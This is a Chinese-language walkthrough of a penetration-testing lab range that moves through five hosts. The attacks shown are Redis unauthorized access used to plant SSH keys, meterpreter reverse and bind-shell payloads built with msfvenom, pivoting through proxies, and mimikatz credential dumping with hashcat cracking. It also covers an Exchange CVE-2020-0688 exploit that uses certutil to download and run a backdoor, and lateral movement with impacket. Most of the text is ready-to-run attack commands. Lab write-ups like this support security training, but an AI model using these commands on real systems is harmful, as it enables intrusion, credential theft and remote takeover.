靶场下载:
链接: https://pan.baidu.com/s/1KGtViLjEjO4ZMgEaW2VljA 提取码: vmk6
第一台ubuntu(redis未授权访问)
发现了目标主机存在未授权redis
在自己的攻击机
cd /root/.ssh
ssh-keygen #天生当地的密钥
(echo -e "\n\n"; cat /root/.ssh/id_ed25519.pub; echo -e "\n\n") >key.txt #读取密钥保存的key.txt
cat key.txt |redis-cli -h 192.168.139.148 -x set xxx #读取key.txt密钥而且毗连redis目标设置xxx数据
redis-cli -h 192.168.139.148
config set slave-read-only no #修改读写权限
config set dir /root/.ssh #设置redis的备份路径为 /root/.ssh
config set dbfilename authorized_keys #设置保存文件名为 authorized_keys
save #保存
用ssh毗连
msf反向上线
天生msf后门
- msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.139.129 LPORT=8888 -f elf > ubuntu1.elf
靶机将其下载下来
攻击机开始监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 8888
run
成功返回
第二台ubuntu(翻阅历史命令)
通过fscan扫描,发现20的主机
就开放了ssh
直接搜索history
发现没有
cat ~/.bash_history(~表示当前用户)
发现了这个、
(阐明可以直接毗连)
msf正向上线
msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=6001 -f elf > ubuntu2.elf
在第一台靶机上
天生,后门,上传戴第一台靶机上
然后第一台靶机开启服务
在第二台靶机上下载
在kali上
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set rhost 192.168.52.20
set lport 6001
run
msf反向转发上线(增补知识)
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.52.10 LPORT=8880 -f elf > 8880.elf
天生反向后门
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.52.10//设置的监听机器为跳板机的ip
lhost => 192.168.52.10
msf6 exploit(multi/handler) > set lport 8880
lport => 8880
msf6 exploit(multi/handler) > run
第三台windows2012(从普通网站到数据库文件泄露提权)
信息收集
建立路由
run post/multi/manage/autoroute
设置socks代理
use auxiliary/server/socks_proxy
发现开放了80和81的web服务
代理上
发现了一个oa的系统
用proxychain 让kali代理 vim /etc/proxychains4.con
通过文件扫描
发现了www.rar的文件
打开发现是sqlserver的密码
提权
发现毗连成功
msf反向上线
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.93.129 LPORT=1132 -f exe > 1132.exe
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lport 1132
set lhost 192.168.93.129
run
第四台exchange服务器攻防
拿下后,发现是域内用户的权限
提权到system
起首getsystem提权
powershell setspn -T rootkit.org -q */*
发现dc开了exchange服务器
发现版本
miniktz提取hash,hashcat暴力破解hash
但是必要域内任意普通账户的明文和密码
像上传minikatz
mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"(必要高权限)getsystem
导出来hash
用导出来的sqladmin的hash来暴力破解
>hashcat -a 0 -m 1000 --force ccef208c6485269c20db2cad21734fe7 pass.txt
成功得到密码
CVE-2020-0688
将后门传到上一台主机
更改host
python cve-2020-0688.py -s https://192.168.3.144/owa/ -u rootkit.org\micle -p Admin12345 -c "cmd /c certutil -urlcache -split -f http://192.168.3.73/1132.exe c:\\1132.exe"
实行命令
通过release
再放回原来的位置
python cve-2020-0688.py -s https://192.168.3.144/owa/ -u rootkit.org\micle -p Admin12345 -c "cmd /c c:\\1132.exe"
上线
第五台windows(ipc)横向移动
拿下exchange服务机器后,getsystem来提权
然后用mimikatz.exe " privilege::debug" "log" sekurlsa::logonpasswords"来提取明文
发现有明文的密码,通过impact套件横向移动拿下
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
